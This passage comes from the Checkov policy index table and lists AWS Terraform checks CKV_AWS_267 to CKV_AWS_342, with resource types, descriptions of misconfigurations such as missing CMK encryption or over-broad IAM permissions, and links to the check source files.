[DBSnapshotCopyUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBSnapshotCopyUsesCMK.py) | +| 371 | CKV_AWS_267 | resource | aws_comprehend_entity_recognizer | Ensure that Comprehend Entity Recognizer's model is encrypted by KMS using a customer managed Key (CMK) | Terraform | [ComprehendEntityRecognizerModelUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ComprehendEntityRecognizerModelUsesCMK.py) | +| 372 | CKV_AWS_268 | resource | aws_comprehend_entity_recognizer | Ensure that Comprehend Entity Recognizer's volume is encrypted by KMS using a customer managed Key (CMK) | Terraform | [ComprehendEntityRecognizerVolumeUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ComprehendEntityRecognizerVolumeUsesCMK.py) | +| 373 | CKV_AWS_269 | resource | aws_connect_instance_storage_config | Ensure Connect Instance Kinesis Video Stream Storage Config uses CMK | Terraform | [ConnectInstanceKinesisVideoStreamStorageConfigUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConnectInstanceKinesisVideoStreamStorageConfigUsesCMK.py) | +| 374 | CKV_AWS_270 | resource | aws_connect_instance_storage_config | Ensure Connect Instance S3 Storage Config uses CMK | Terraform | [ConnectInstanceS3StorageConfigUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConnectInstanceS3StorageConfigUsesCMK.py) | +| 375 | CKV_AWS_271 | resource | aws_dynamodb_table_replica | Ensure DynamoDB table replica KMS encryption uses CMK | Terraform | [DynamoDBTableReplicaKMSUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBTableReplicaKMSUsesCMK.py) | +| 376 | CKV_AWS_272 | resource | aws_lambda_function | Ensure AWS Lambda function is configured to validate code-signing | Terraform | 
[LambdaCodeSigningConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaCodeSigningConfigured.py) | +| 377 | CKV_AWS_273 | resource | aws_iam_user | Ensure access is controlled through SSO and not AWS IAM defined users | Terraform | [IAMUserNotUsedForAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMUserNotUsedForAccess.py) | +| 378 | CKV_AWS_274 | resource | aws_iam_group_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | +| 379 | CKV_AWS_274 | resource | aws_iam_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | +| 380 | CKV_AWS_274 | resource | aws_iam_role | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | +| 381 | CKV_AWS_274 | resource | aws_iam_role_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | +| 382 | CKV_AWS_274 | resource | aws_iam_user_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | +| 383 | CKV_AWS_274 | resource | 
aws_ssoadmin_managed_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | +| 384 | CKV_AWS_275 | data | aws_iam_policy | Disallow policies from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMManagedAdminPolicy.py) | +| 385 | CKV_AWS_276 | resource | aws_api_gateway_method_settings | Ensure Data Trace is not enabled in API Gateway Method Settings | Terraform | [APIGatewayMethodSettingsDataTrace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsDataTrace.py) | +| 386 | CKV_AWS_277 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1 | Terraform | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py) | +| 387 | CKV_AWS_277 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1 | Terraform | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py) | +| 388 | CKV_AWS_277 | resource | aws_vpc_security_group_ingress_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1 | Terraform | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py) | +| 389 | CKV_AWS_278 | resource | aws_memorydb_snapshot | Ensure MemoryDB snapshot is encrypted by KMS using a customer managed Key (CMK) | Terraform | 
[MemoryDBSnapshotEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBSnapshotEncryptionWithCMK.py) | +| 390 | CKV_AWS_279 | resource | aws_neptune_cluster_snapshot | Ensure Neptune snapshot is securely encrypted | Terraform | [NeptuneClusterSnapshotEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterSnapshotEncrypted.py) | +| 391 | CKV_AWS_280 | resource | aws_neptune_cluster_snapshot | Ensure Neptune snapshot is encrypted by KMS using a customer managed Key (CMK) | Terraform | [NeptuneClusterSnapshotEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterSnapshotEncryptedWithCMK.py) | +| 392 | CKV_AWS_281 | resource | aws_redshift_snapshot_copy_grant | Ensure RedShift snapshot copy is encrypted by KMS using a customer managed Key (CMK) | Terraform | [RedshiftClusterSnapshotCopyGrantEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterSnapshotCopyGrantEncryptedWithCMK.py) | +| 393 | CKV_AWS_282 | resource | aws_redshiftserverless_namespace | Ensure that Redshift Serverless namespace is encrypted by KMS using a customer managed key (CMK) | Terraform | [RedshiftServerlessNamespaceKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftServerlessNamespaceKMSKey.py) | +| 394 | CKV_AWS_283 | data | aws_iam_policy_document | Ensure no IAM policies documents allow ALL or any AWS principal permissions to the resource | Terraform | [IAMPublicActionsPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPublicActionsPolicy.py) | +| 395 | CKV_AWS_284 | resource | aws_sfn_state_machine | Ensure State Machine has X-Ray tracing enabled | Terraform | 
[StateMachineXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/StateMachineXray.py) | +| 396 | CKV_AWS_285 | resource | aws_sfn_state_machine | Ensure State Machine has execution history logging enabled | Terraform | [StateMachineLoggingExecutionHistory.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/StateMachineLoggingExecutionHistory.py) | +| 397 | CKV_AWS_286 | resource | aws_iam_group_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | +| 398 | CKV_AWS_286 | resource | aws_iam_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | +| 399 | CKV_AWS_286 | resource | aws_iam_role_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | +| 400 | CKV_AWS_286 | resource | aws_iam_user_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | +| 401 | CKV_AWS_286 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | +| 402 | CKV_AWS_287 | resource | aws_iam_group_policy | Ensure IAM policies does not allow credentials exposure | Terraform | 
[IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | +| 403 | CKV_AWS_287 | resource | aws_iam_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | +| 404 | CKV_AWS_287 | resource | aws_iam_role_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | +| 405 | CKV_AWS_287 | resource | aws_iam_user_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | +| 406 | CKV_AWS_287 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | +| 407 | CKV_AWS_288 | resource | aws_iam_group_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | +| 408 | CKV_AWS_288 | resource | aws_iam_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | +| 409 | CKV_AWS_288 | resource | aws_iam_role_policy | Ensure IAM policies does not allow data exfiltration | Terraform | 
[IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | +| 410 | CKV_AWS_288 | resource | aws_iam_user_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | +| 411 | CKV_AWS_288 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | +| 412 | CKV_AWS_289 | resource | aws_iam_group_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | +| 413 | CKV_AWS_289 | resource | aws_iam_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | +| 414 | CKV_AWS_289 | resource | aws_iam_role_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | +| 415 | CKV_AWS_289 | resource | aws_iam_user_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | +| 416 | CKV_AWS_289 | resource | 
aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | +| 417 | CKV_AWS_290 | resource | aws_iam_group_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | +| 418 | CKV_AWS_290 | resource | aws_iam_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | +| 419 | CKV_AWS_290 | resource | aws_iam_role_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | +| 420 | CKV_AWS_290 | resource | aws_iam_user_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | +| 421 | CKV_AWS_290 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | +| 422 | CKV_AWS_291 | resource | aws_msk_cluster | Ensure MSK nodes are private | Terraform | [MSKClusterNodesArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterNodesArePrivate.py) | +| 423 | CKV_AWS_292 | resource | aws_docdb_global_cluster | Ensure DocumentDB Global Cluster 
is encrypted at rest (default is unencrypted) | Terraform | [DocDBGlobalClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBGlobalClusterEncryption.py) | +| 424 | CKV_AWS_293 | resource | aws_db_instance | Ensure that AWS database instances have deletion protection enabled | Terraform | [RDSInstanceDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstanceDeletionProtection.py) | +| 425 | CKV_AWS_294 | resource | aws_cloudtrail_event_data_store | Ensure CloudTrail Event Data Store uses CMK | Terraform | [CloudtrailEventDataStoreUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEventDataStoreUsesCMK.py) | +| 426 | CKV_AWS_295 | resource | aws_datasync_location_object_storage | Ensure DataSync Location Object Storage doesn't expose secrets | Terraform | [DatasyncLocationExposesSecrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DatasyncLocationExposesSecrets.py) | +| 427 | CKV_AWS_296 | resource | aws_dms_endpoint | Ensure DMS endpoint uses Customer Managed Key (CMK) | Terraform | [DMSEndpointUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSEndpointUsesCMK.py) | +| 428 | CKV_AWS_297 | resource | aws_scheduler_schedule | Ensure EventBridge Scheduler Schedule uses Customer Managed Key (CMK) | Terraform | [SchedulerScheduleUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SchedulerScheduleUsesCMK.py) | +| 429 | CKV_AWS_298 | resource | aws_dms_s3_endpoint | Ensure DMS S3 uses Customer Managed Key (CMK) | Terraform | [DMSS3UsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSS3UsesCMK.py) | +| 430 | CKV_AWS_300 | resource | aws_s3_bucket_lifecycle_configuration | Ensure S3 lifecycle 
configuration sets period for aborting failed uploads | Terraform | [S3AbortIncompleteUploads.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AbortIncompleteUploads.py) | +| 431 | CKV_AWS_301 | resource | aws_lambda_permission | Ensure that AWS Lambda function is not publicly accessible | Terraform | [LambdaFunctionIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionIsNotPublic.py) | +| 432 | CKV_AWS_302 | resource | aws_db_snapshot | Ensure DB Snapshots are not Public | Terraform | [DBSnapshotsArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBSnapshotsArePrivate.py) | +| 433 | CKV_AWS_303 | resource | aws_ssm_document | Ensure SSM documents are not Public | Terraform | [SSMDocumentsArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMDocumentsArePrivate.py) | +| 434 | CKV_AWS_304 | resource | aws_secretsmanager_secret_rotation | Ensure Secrets Manager secrets should be rotated within 90 days | Terraform | [SecretManagerSecret90days.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecretManagerSecret90days.py) | +| 435 | CKV_AWS_305 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution has a default root object configured | Terraform | [CloudfrontDistributionDefaultRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionDefaultRoot.py) | +| 436 | CKV_AWS_306 | resource | aws_sagemaker_notebook_instance | Ensure SageMaker notebook instances should be launched into a custom VPC | Terraform | [SagemakerNotebookInCustomVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookInCustomVPC.py) | +| 437 | CKV_AWS_307 | resource | aws_sagemaker_notebook_instance | Ensure 
SageMaker Users should not have root access to SageMaker notebook instances | Terraform | [SagemakerNotebookRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookRoot.py) | +| 438 | CKV_AWS_308 | resource | aws_api_gateway_method_settings | Ensure API Gateway method setting caching is set to encrypted | Terraform | [APIGatewayMethodSettingsCacheEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsCacheEncrypted.py) | +| 439 | CKV_AWS_309 | resource | aws_apigatewayv2_route | Ensure API GatewayV2 routes specify an authorization type | Terraform | [APIGatewayV2RouteDefinesAuthorizationType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayV2RouteDefinesAuthorizationType.py) | +| 440 | CKV_AWS_310 | resource | aws_cloudfront_distribution | Ensure CloudFront distributions should have origin failover configured | Terraform | [CloudfrontDistributionOriginFailover.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionOriginFailover.py) | +| 441 | CKV_AWS_311 | resource | aws_codebuild_project | Ensure that CodeBuild S3 logs are encrypted | Terraform | [CodebuildS3LogsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildS3LogsEncrypted.py) | +| 442 | CKV_AWS_312 | resource | aws_elastic_beanstalk_environment | Ensure Elastic Beanstalk environments have enhanced health reporting enabled | Terraform | [ElasticBeanstalkUseEnhancedHealthChecks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticBeanstalkUseEnhancedHealthChecks.py) | +| 443 | CKV_AWS_313 | resource | aws_rds_cluster | Ensure RDS cluster configured to copy tags to snapshots | Terraform | 
[RDSClusterCopyTags.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterCopyTags.py) | +| 444 | CKV_AWS_314 | resource | aws_codebuild_project | Ensure CodeBuild project environments have a logging configuration | Terraform | [CodebuildHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildHasLogs.py) | +| 445 | CKV_AWS_315 | resource | aws_autoscaling_group | Ensure EC2 Auto Scaling groups use EC2 launch templates | Terraform | [AutoScalingLaunchTemplate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AutoScalingLaunchTemplate.py) | +| 446 | CKV_AWS_316 | resource | aws_codebuild_project | Ensure CodeBuild project environments do not have privileged mode enabled | Terraform | [CodeBuildPrivilegedMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeBuildPrivilegedMode.py) | +| 447 | CKV_AWS_317 | resource | aws_elasticsearch_domain | Ensure Elasticsearch Domain Audit Logging is enabled | Terraform | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | +| 448 | CKV_AWS_317 | resource | aws_opensearch_domain | Ensure Elasticsearch Domain Audit Logging is enabled | Terraform | [ElasticsearchDomainAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainAuditLogging.py) | +| 449 | CKV_AWS_318 | resource | aws_elasticsearch_domain | Ensure Elasticsearch domains are configured with at least three dedicated master nodes for HA | Terraform | [ElasticsearchDomainHA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainHA.py) | +| 450 | CKV_AWS_318 | resource | aws_opensearch_domain | Ensure Elasticsearch domains are configured with at least three 
dedicated master nodes for HA | Terraform | [ElasticsearchDomainHA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainHA.py) | +| 451 | CKV_AWS_319 | resource | aws_cloudwatch_metric_alarm | Ensure that CloudWatch alarm actions are enabled | Terraform | [CloudWatchAlarmsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchAlarmsEnabled.py) | +| 452 | CKV_AWS_320 | resource | aws_redshift_cluster | Ensure Redshift clusters do not use the default database name | Terraform | [RedshiftClusterDatabaseName.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterDatabaseName.py) | +| 453 | CKV_AWS_321 | resource | aws_redshift_cluster | Ensure Redshift clusters use enhanced VPC routing | Terraform | [RedshiftClusterUseEnhancedVPCRouting.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterUseEnhancedVPCRouting.py) | +| 454 | CKV_AWS_322 | resource | aws_elasticache_cluster | Ensure ElastiCache for Redis cache clusters have auto minor version upgrades enabled | Terraform | [ElasticCacheAutomaticMinorUpgrades.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticCacheAutomaticMinorUpgrades.py) | +| 455 | CKV_AWS_323 | resource | aws_elasticache_cluster | Ensure ElastiCache clusters do not use the default subnet group | Terraform | [ElastiCacheHasCustomSubnet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElastiCacheHasCustomSubnet.py) | +| 456 | CKV_AWS_324 | resource | aws_rds_cluster | Ensure that RDS Cluster log capture is enabled | Terraform | [RDSClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterLogging.py) | +| 457 | CKV_AWS_325 | resource | aws_rds_cluster | Ensure that RDS Cluster audit logging 
is enabled for MySQL engine | Terraform | [RDSClusterAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterAuditLogging.py) | +| 458 | CKV_AWS_326 | resource | aws_rds_cluster | Ensure that RDS Aurora Clusters have backtracking enabled | Terraform | [RDSClusterAuroraBacktrack.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterAuroraBacktrack.py) | +| 459 | CKV_AWS_327 | resource | aws_rds_cluster | Ensure RDS Clusters are encrypted using KMS CMKs | Terraform | [RDSClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterEncryptedWithCMK.py) | +| 460 | CKV_AWS_328 | resource | aws_alb | Ensure that ALB is configured with defensive or strictest desync mitigation mode | Terraform | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py) | +| 461 | CKV_AWS_328 | resource | aws_elb | Ensure that ALB is configured with defensive or strictest desync mitigation mode | Terraform | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py) | +| 462 | CKV_AWS_328 | resource | aws_lb | Ensure that ALB is configured with defensive or strictest desync mitigation mode | Terraform | [ALBDesyncMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDesyncMode.py) | +| 463 | CKV_AWS_329 | resource | aws_efs_access_point | EFS access points should enforce a root directory | Terraform | [EFSAccessPointRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSAccessPointRoot.py) | +| 464 | CKV_AWS_330 | resource | aws_efs_access_point | EFS access points should enforce a user identity | Terraform | 
[EFSAccessUserIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSAccessUserIdentity.py) | +| 465 | CKV_AWS_331 | resource | aws_ec2_transit_gateway | Ensure Transit Gateways do not automatically accept VPC attachment requests | Terraform | [Ec2TransitGatewayAutoAccept.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/Ec2TransitGatewayAutoAccept.py) | +| 466 | CKV_AWS_332 | resource | aws_ecs_service | Ensure ECS Fargate services run on the latest Fargate platform version | Terraform | [ECSServiceFargateLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSServiceFargateLatest.py) | +| 467 | CKV_AWS_333 | resource | aws_ecs_service | Ensure ECS services do not have public IP addresses assigned to them automatically | Terraform | [ECSServicePublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSServicePublicIP.py) | +| 468 | CKV_AWS_334 | resource | aws_ecs_task_definition | Ensure ECS containers should run as non-privileged | Terraform | [ECSContainerPrivilege.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerPrivilege.py) | +| 469 | CKV_AWS_335 | resource | aws_ecs_task_definition | Ensure ECS task definitions should not share the host's process namespace | Terraform | [ECSContainerHostProcess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerHostProcess.py) | +| 470 | CKV_AWS_336 | resource | aws_ecs_task_definition | Ensure ECS containers are limited to read-only access to root filesystems | Terraform | [ECSContainerReadOnlyRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSContainerReadOnlyRoot.py) | +| 471 | CKV_AWS_337 | resource | aws_ssm_parameter | Ensure SSM parameters are using KMS CMK | Terraform | 
[SSMParameterUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMParameterUsesCMK.py) | +| 472 | CKV_AWS_338 | resource | aws_cloudwatch_log_group | Ensure CloudWatch log groups retains logs for at least 1 year | Terraform | [CloudWatchLogGroupRetentionYear.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupRetentionYear.py) | +| 473 | CKV_AWS_339 | resource | aws_eks_cluster | Ensure EKS clusters run on a supported Kubernetes version | Terraform | [EKSPlatformVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPlatformVersion.py) | +| 474 | CKV_AWS_340 | resource | aws_elastic_beanstalk_environment | Ensure Elastic Beanstalk managed platform updates are enabled | Terraform | [ElasticBeanstalkUseManagedUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticBeanstalkUseManagedUpdates.py) | +| 475 | CKV_AWS_341 | resource | aws_launch_configuration | Ensure Launch template should not have a metadata response hop limit greater than 1 | Terraform | [LaunchTemplateMetadataHop.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchTemplateMetadataHop.py) | +| 476 | CKV_AWS_341 | resource | aws_launch_template | Ensure Launch template should not have a metadata response hop limit greater than 1 | Terraform | [LaunchTemplateMetadataHop.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchTemplateMetadataHop.py) | +| 477 | CKV_AWS_342 | resource | aws_waf_rule_group | Ensure WAF rule has any actions | Terraform | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py) | +| 478 | CKV_AWS_342 | resource | aws_waf_web_acl | Ensure WAF rule has any actions | Terraform | 
